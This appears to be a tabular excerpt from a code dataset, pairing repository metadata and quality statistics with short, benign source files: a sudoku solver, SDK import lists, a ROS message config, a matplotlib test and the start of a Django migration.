hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3374213c5a85817ad573e9d0c8eac937f90312d2 | 172 | py | Python | repos_small.py | PeterEltgroth/repo-bulk-deprecate | d15a91ab6cf378e4675b00e3d18d89ece46b0049 | [
"Apache-2.0"
] | 1 | 2022-01-17T22:00:45.000Z | 2022-01-17T22:00:45.000Z | repos_small.py | PeterEltgroth/repo-bulk-deprecate | d15a91ab6cf378e4675b00e3d18d89ece46b0049 | [
"Apache-2.0"
] | null | null | null | repos_small.py | PeterEltgroth/repo-bulk-deprecate | d15a91ab6cf378e4675b00e3d18d89ece46b0049 | [
"Apache-2.0"
] | 1 | 2020-11-18T15:38:46.000Z | 2020-11-18T15:38:46.000Z | repos = [
"github.com/cf-platform-eng/mesos-boshrelease",
"github.com/cf-platform-eng/eureka-registrar-decorator",
"github.com/cf-platform-eng/demo-hdfs-app"
]
| 28.666667 | 60 | 0.709302 | 24 | 172 | 5.083333 | 0.583333 | 0.221311 | 0.270492 | 0.467213 | 0.540984 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110465 | 172 | 5 | 61 | 34.4 | 0.797386 | 0 | 0 | 0 | 0 | 0 | 0.796512 | 0.796512 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
684b7b07492079cb42d4e40c935cebfd1f3f61ef | 2,978 | py | Python | accelbyte_py_sdk/api/gdpr/__init__.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | null | null | null | accelbyte_py_sdk/api/gdpr/__init__.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | 1 | 2021-10-13T03:46:58.000Z | 2021-10-13T03:46:58.000Z | accelbyte_py_sdk/api/gdpr/__init__.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | null | null | null | # Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
"""Auto-generated package that contains models used by the justice-gdpr-service."""
__version__ = "1.14.6"
__author__ = "AccelByte"
__email__ = "dev@accelbyte.net"
# pylint: disable=line-too-long
# data_deletion
from .wrappers import admin_cancel_user_account_deletion_request
from .wrappers import admin_cancel_user_account_deletion_request_async
from .wrappers import admin_get_list_deletion_data_request
from .wrappers import admin_get_list_deletion_data_request_async
from .wrappers import admin_get_user_account_deletion_request
from .wrappers import admin_get_user_account_deletion_request_async
from .wrappers import admin_submit_user_account_deletion_request
from .wrappers import admin_submit_user_account_deletion_request_async
from .wrappers import public_cancel_user_account_deletion_request
from .wrappers import public_cancel_user_account_deletion_request_async
from .wrappers import public_get_user_account_deletion_status
from .wrappers import public_get_user_account_deletion_status_async
from .wrappers import public_submit_user_account_deletion_request
from .wrappers import public_submit_user_account_deletion_request_async
# data_retrieval
from .wrappers import admin_cancel_user_personal_data_request
from .wrappers import admin_cancel_user_personal_data_request_async
from .wrappers import admin_generate_personal_data_url
from .wrappers import admin_generate_personal_data_url_async
from .wrappers import admin_get_list_personal_data_request
from .wrappers import admin_get_list_personal_data_request_async
from .wrappers import admin_get_user_personal_data_requests
from .wrappers import admin_get_user_personal_data_requests_async
from .wrappers import admin_request_data_retrieval
from .wrappers import admin_request_data_retrieval_async
from .wrappers import delete_admin_email_configuration
from .wrappers import delete_admin_email_configuration_async
from .wrappers import get_admin_email_configuration
from .wrappers import get_admin_email_configuration_async
from .wrappers import public_cancel_user_personal_data_request
from .wrappers import public_cancel_user_personal_data_request_async
from .wrappers import public_generate_personal_data_url
from .wrappers import public_generate_personal_data_url_async
from .wrappers import public_get_user_personal_data_requests
from .wrappers import public_get_user_personal_data_requests_async
from .wrappers import public_request_data_retrieval
from .wrappers import public_request_data_retrieval_async
from .wrappers import save_admin_email_configuration
from .wrappers import save_admin_email_configuration_async
from .wrappers import update_admin_email_configuration
from .wrappers import update_admin_email_configuration_async
| 49.633333 | 83 | 0.893553 | 420 | 2,978 | 5.828571 | 0.192857 | 0.196078 | 0.294118 | 0.169118 | 0.855392 | 0.85335 | 0.845997 | 0.629902 | 0.564542 | 0 | 0 | 0.002911 | 0.077233 | 2,978 | 59 | 84 | 50.474576 | 0.887918 | 0.13096 | 0 | 0 | 1 | 0 | 0.012432 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.930233 | 0 | 0.930233 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
68625ade09261a45c66a1a3cbc2f1b0dca686314 | 1,845 | py | Python | Rover/build_isolated/cartographer_ros_msgs/cmake/cartographer_ros_msgs-genmsg-context.py | Rose-Hulman-Rover-Team/Rover-2019-2020 | d75a9086fa733f8a8b5240005bee058737ad82c7 | [
"MIT"
] | null | null | null | Rover/build_isolated/cartographer_ros_msgs/cmake/cartographer_ros_msgs-genmsg-context.py | Rose-Hulman-Rover-Team/Rover-2019-2020 | d75a9086fa733f8a8b5240005bee058737ad82c7 | [
"MIT"
] | null | null | null | Rover/build_isolated/cartographer_ros_msgs/cmake/cartographer_ros_msgs-genmsg-context.py | Rose-Hulman-Rover-Team/Rover-2019-2020 | d75a9086fa733f8a8b5240005bee058737ad82c7 | [
"MIT"
] | null | null | null | # generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = "/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/LandmarkEntry.msg;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/LandmarkList.msg;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/StatusCode.msg;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/StatusResponse.msg;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/SubmapList.msg;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/SubmapEntry.msg;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/SubmapTexture.msg;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/SensorTopics.msg;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg/TrajectoryOptions.msg"
services_str = "/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/srv/SubmapQuery.srv;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/srv/FinishTrajectory.srv;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/srv/StartTrajectory.srv;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/srv/WriteState.srv"
pkg_name = "cartographer_ros_msgs"
dependencies_str = "geometry_msgs;std_msgs"
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
dep_include_paths_str = "cartographer_ros_msgs;/home/chenz16/Desktop/Rover/src/cartographer_ros/cartographer_ros_msgs/msg;geometry_msgs;/opt/ros/kinetic/share/geometry_msgs/cmake/../msg;std_msgs;/opt/ros/kinetic/share/std_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/kinetic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
| 153.75 | 848 | 0.852575 | 262 | 1,845 | 5.744275 | 0.240458 | 0.299003 | 0.201993 | 0.213953 | 0.641196 | 0.61196 | 0.61196 | 0.61196 | 0.61196 | 0.61196 | 0 | 0.015461 | 0.018428 | 1,845 | 11 | 849 | 167.727273 | 0.815572 | 0.026558 | 0 | 0 | 1 | 0.333333 | 0.886845 | 0.876254 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
689d6d12af5eaaa85a0a43cf76278ad3058d25ea | 183 | py | Python | anvil/sub_rig_templates/quadruped_leg.py | AndresMWeber/Anvil | 9cd202183ac998983c2bf6e55cc46bbc0ca1a78e | [
"Apache-2.0"
] | 3 | 2019-11-22T04:38:06.000Z | 2022-01-19T08:27:18.000Z | anvil/sub_rig_templates/quadruped_leg.py | AndresMWeber/Anvil | 9cd202183ac998983c2bf6e55cc46bbc0ca1a78e | [
"Apache-2.0"
] | 28 | 2018-02-01T20:39:42.000Z | 2018-04-26T17:25:23.000Z | anvil/sub_rig_templates/quadruped_leg.py | AndresMWeber/Anvil | 9cd202183ac998983c2bf6e55cc46bbc0ca1a78e | [
"Apache-2.0"
] | 1 | 2018-03-11T06:47:26.000Z | 2018-03-11T06:47:26.000Z | from base_sub_rig_template import SubRigTemplate
class QuadrupedLeg(SubRigTemplate):
BUILT_IN_META_DATA = SubRigTemplate.BUILT_IN_META_DATA.merge({'name': 'quadleg'}, new=True)
| 30.5 | 95 | 0.814208 | 24 | 183 | 5.833333 | 0.75 | 0.271429 | 0.3 | 0.357143 | 0.414286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092896 | 183 | 5 | 96 | 36.6 | 0.843373 | 0 | 0 | 0 | 0 | 0 | 0.060109 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d7f043c071fa13ed9994ff58eec72751992ef91e | 7,972 | py | Python | Backtracking/python/Sudoku_Solver.py | kiruba-r11/DSA-guide | 0687bddf81a14955fa0740610ade3b67bcdf97fb | [
"MIT"
] | 60 | 2020-10-04T13:19:26.000Z | 2022-01-23T09:09:27.000Z | Backtracking/python/Sudoku_Solver.py | kiruba-r11/DSA-guide | 0687bddf81a14955fa0740610ade3b67bcdf97fb | [
"MIT"
] | 202 | 2020-10-04T13:03:46.000Z | 2021-07-29T07:39:15.000Z | Backtracking/python/Sudoku_Solver.py | kiruba-r11/DSA-guide | 0687bddf81a14955fa0740610ade3b67bcdf97fb | [
"MIT"
] | 169 | 2020-10-04T13:21:09.000Z | 2022-03-20T16:59:35.000Z | # Title: Sudoku Solver
# Link: https://leetcode.com/problems/sudoku-solver/
board = [["5","3",".",".","7",".",".",".","."],
["6",".",".","1","9","5",".",".","."],
[".","9","8",".",".",".",".","6","."],
["8",".",".",".","6",".",".",".","3"],
["4",".",".","8",".","3",".",".","1"],
["7",".",".",".","2",".",".",".","6"],
[".","6",".",".",".",".","2","8","."],
[".",".",".","4","1","9",".",".","5"],
[".",".",".",".","8",".",".","7","9"]]
import collections
class Solution:
    def solveSudoku(self, board: "list[list[str]]") -> None:
"""
Do not return anything, modify board in-place instead.
"""
def is_valid(r, c, n):
if n in self.rows[r] or n in self.columns[c] or n in self.sub_boxes[(r//3,c//3)]:
return False
return True
def place_num(r, c, n):
self.rows[r].add(n)
self.columns[c].add(n)
self.sub_boxes[(r//3,c//3)].add(n)
board[r][c] = n
def remove_num(r, c, n):
self.rows[r].remove(n)
self.columns[c].remove(n)
self.sub_boxes[(r//3,c//3)].remove(n)
board[r][c] = "."
def backtrack(emp_key, emp_indice):
row = emp_key
col = self.emp[emp_key][emp_indice]
            # based on the dict self.emp key and the index value, we retrieve the column value.
resolved = False
for num in range(1, 10):
# iterate through numbers 1-9 at the current cell.
if is_valid(row, col, str(num)):
# examining if the num meets the rules
place_num(row, col, str(num))
# fill the cell in the 2-D array and update the tracking dicts
if row + 1 == 9 and emp_indice + 1 == len(self.emp[emp_key]):
                        # we reach the bottom row and the last column element in the list, i.e. we find a solution!
resolved = True
return resolved
elif emp_indice + 1 < len(self.emp[emp_key]):
# we move on to the next column in the same row
resolved = backtrack(emp_key, emp_indice+1)
elif emp_indice + 1 == len(self.emp[emp_key]):
# we move on to the next row with the first empty cell
resolved = backtrack(emp_key+1, 0)
if not resolved:
# backtrack, i.e. remove the num from the 2-D array and from the tracking dicts
remove_num(row, col, str(num))
else:
break
return resolved
self.rows = collections.defaultdict(set)
# using dict self.rows to track the digits in each row
self.columns = collections.defaultdict(set)
# using dict self.columns to track the digits in each column
self.sub_boxes = collections.defaultdict(set)
# using dict self.sub_boxes to track the digits in each 3x3 sub-box
self.emp = collections.defaultdict(list)
# using dict self.emp to track the empty cells in the 2-D array
        # Note that in dict self.emp, the key is a row number of the 2-D array, and the value is
        # the list of column numbers of the empty cells in that row.
        # E.g., 0:[2, 3, 5, 6, 7, 8] --> row number is 0, column numbers are 2, 3, 5, 6, 7, and 8
for i in range(9):
for j in range(9):
if board[i][j] != ".":
self.rows[i].add(board[i][j])
self.columns[j].add(board[i][j])
self.sub_boxes[(i//3,j//3)].add(board[i][j])
else:
self.emp[i].append(j)
        # we work on dict self.emp, passing in the first row number 0 and index 0 into the
        # value list that holds the column numbers.
backtrack(0, 0)
solution = Solution()
solution.solveSudoku(board)
for x in board:
print(x)
| 44.786517 | 122 | 0.489212 | 1,102 | 7,972 | 3.491833 | 0.118875 | 0.036383 | 0.037422 | 0.025988 | 0.980769 | 0.980769 | 0.980769 | 0.980769 | 0.980769 | 0.980769 | 0 | 0.029395 | 0.342825 | 7,972 | 177 | 123 | 45.039548 | 0.705096 | 0.297291 | 0 | 0.983607 | 0 | 0 | 0.030062 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081967 | false | 0 | 0.016393 | 0 | 0.180328 | 0.008197 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0bd052231e9b88dda60685de6ef458c3a82d2ab7 | 115 | py | Python | src/yews/transforms/__init__.py | Lchuang/yews | 254c1d3887b812a94421bd6ccef4a51a7ef330e0 | [
"Apache-2.0"
] | 6 | 2019-04-15T17:41:34.000Z | 2019-08-18T13:17:23.000Z | src/yews/transforms/__init__.py | Luojiahong/yews | a3653f9d29cbeb257bdc28019ab7fbba365dec94 | [
"Apache-2.0"
] | 11 | 2020-04-19T12:28:56.000Z | 2021-05-13T16:43:03.000Z | src/yews/transforms/__init__.py | ChujieChen/yews | a80881597a45375353f80b696670b27cdfec5db2 | [
"Apache-2.0"
] | 9 | 2019-04-28T04:28:16.000Z | 2020-04-17T18:29:07.000Z | from .base import BaseTransform
from .base import Compose
from .base import is_transform
from .transforms import *
| 23 | 31 | 0.817391 | 16 | 115 | 5.8125 | 0.5 | 0.258065 | 0.451613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.13913 | 115 | 4 | 32 | 28.75 | 0.939394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9be74f9a0a1be31d7d2df3d98782ab7d28d871e2 | 150 | py | Python | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/leopard/phys/PHY_internal_base.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 82 | 2016-06-29T17:24:43.000Z | 2021-04-16T06:49:17.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/leopard/phys/PHY_internal_base.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 6 | 2022-01-12T18:22:08.000Z | 2022-03-25T10:19:27.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/leopard/phys/PHY_internal_base.py | lmnotran/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 56 | 2016-08-02T10:50:50.000Z | 2021-07-19T08:57:34.000Z | from pyradioconfig.parts.lynx.phys.PHY_internal_base import Phy_Internal_Base_Lynx
class phy_internal_base_leopard(Phy_Internal_Base_Lynx):
pass | 30 | 82 | 0.873333 | 23 | 150 | 5.217391 | 0.521739 | 0.366667 | 0.5 | 0.316667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08 | 150 | 5 | 83 | 30 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 9 |
9bfbfcc0d76e8ee209630a729747fcaef727484b | 3,355 | py | Python | test/test_tick_positions.py | satejsoman/matplotlib2tikz | 583a66f6842d236ee42d85485de9c6a503585893 | [
"MIT"
] | 1 | 2021-05-25T20:47:41.000Z | 2021-05-25T20:47:41.000Z | test/test_tick_positions.py | satejsoman/matplotlib2tikz | 583a66f6842d236ee42d85485de9c6a503585893 | [
"MIT"
] | null | null | null | test/test_tick_positions.py | satejsoman/matplotlib2tikz | 583a66f6842d236ee42d85485de9c6a503585893 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
from helpers import assert_equality
def plot():
from matplotlib import pyplot as plt
x = [1, 2, 3, 4]
y = [1, 4, 9, 6]
fig = plt.figure()
ax = plt.subplot(4, 4, 1)
plt.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="off", top="off")
plt.tick_params(axis="y", which="both", left="off", right="off")
ax = plt.subplot(4, 4, 2)
plt.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="off", top="off")
plt.tick_params(axis="y", which="both", left="off", right="on")
ax = plt.subplot(4, 4, 3)
plt.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="off", top="off")
plt.tick_params(axis="y", which="both", left="on", right="off")
ax = plt.subplot(4, 4, 4)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="off", top="off")
plt.tick_params(axis="y", which="both", left="on", right="on")
ax = plt.subplot(4, 4, 5)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="off", top="on")
plt.tick_params(axis="y", which="both", left="off", right="off")
ax = plt.subplot(4, 4, 6)
plt.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="off", top="on")
plt.tick_params(axis="y", which="both", left="off", right="on")
ax = plt.subplot(4, 4, 7)
plt.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="off", top="on")
plt.tick_params(axis="y", which="both", left="on", right="off")
ax = plt.subplot(4, 4, 8)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="off", top="on")
plt.tick_params(axis="y", which="both", left="on", right="on")
ax = plt.subplot(4, 4, 9)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="on", top="off")
plt.tick_params(axis="y", which="both", left="off", right="off")
ax = plt.subplot(4, 4, 10)
plt.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="on", top="off")
plt.tick_params(axis="y", which="both", left="off", right="on")
ax = plt.subplot(4, 4, 11)
plt.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="on", top="off")
plt.tick_params(axis="y", which="both", left="on", right="off")
ax = plt.subplot(4, 4, 12)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="on", top="off")
plt.tick_params(axis="y", which="both", left="on", right="on")
ax = plt.subplot(4, 4, 13)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="on", top="on")
plt.tick_params(axis="y", which="both", left="off", right="off")
ax = plt.subplot(4, 4, 14)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="on", top="on")
plt.tick_params(axis="y", which="both", left="off", right="on")
ax = plt.subplot(4, 4, 15)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="on", top="on")
plt.tick_params(axis="y", which="both", left="on", right="off")
ax = plt.subplot(4, 4, 16)
ax.plot(x, y, "ro")
plt.tick_params(axis="x", which="both", bottom="on", top="on")
plt.tick_params(axis="y", which="both", left="on", right="on")
return fig
def test():
assert_equality(plot, __file__[:-3] + "_reference.tex")
return
| 33.55 | 68 | 0.573174 | 569 | 3,355 | 3.311072 | 0.091388 | 0.118896 | 0.220807 | 0.288747 | 0.903928 | 0.896497 | 0.896497 | 0.896497 | 0.896497 | 0.896497 | 0 | 0.023636 | 0.180328 | 3,355 | 99 | 69 | 33.888889 | 0.661455 | 0.006259 | 0 | 0.648649 | 0 | 0 | 0.109877 | 0 | 0 | 0 | 0 | 0 | 0.027027 | 1 | 0.027027 | false | 0 | 0.027027 | 0 | 0.081081 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
50177263ab82ec82cbddbc6d8898f74ea1347560 | 73 | py | Python | bigsql/err.py | wabscale/bigsql | 9ac9efc9747765a05d9161df5de725a8895ac759 | [
"MIT"
] | 1 | 2021-07-02T15:39:21.000Z | 2021-07-02T15:39:21.000Z | bigsql/err.py | wabscale/bigsql | 9ac9efc9747765a05d9161df5de725a8895ac759 | [
"MIT"
] | null | null | null | bigsql/err.py | wabscale/bigsql | 9ac9efc9747765a05d9161df5de725a8895ac759 | [
"MIT"
] | null | null | null | import pymysql.err
class big_ERROR(pymysql.err.IntegrityError):
pass | 18.25 | 44 | 0.794521 | 10 | 73 | 5.7 | 0.8 | 0.350877 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.123288 | 73 | 4 | 45 | 18.25 | 0.890625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
4a05edb6c0bca8e76cd51c3be4bdfd6230c29623 | 39,981 | py | Python | week/migrations/0001_initial.py | uno-isqa-8950/fitgirl-inc | 2656e7340e85ab8cbeb0de19dcbc81030b9b5b81 | [
"MIT"
] | 6 | 2018-09-11T15:30:10.000Z | 2020-01-14T17:29:07.000Z | week/migrations/0001_initial.py | uno-isqa-8950/fitgirl-inc | 2656e7340e85ab8cbeb0de19dcbc81030b9b5b81 | [
"MIT"
] | 722 | 2018-08-29T17:27:38.000Z | 2022-03-11T23:28:33.000Z | week/migrations/0001_initial.py | uno-isqa-8950/fitgirl-inc | 2656e7340e85ab8cbeb0de19dcbc81030b9b5b81 | [
"MIT"
] | 13 | 2018-08-29T07:42:01.000Z | 2019-04-21T22:34:30.000Z | # Generated by Django 2.2.4 on 2020-05-03 17:02
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
import wagtail.core.fields
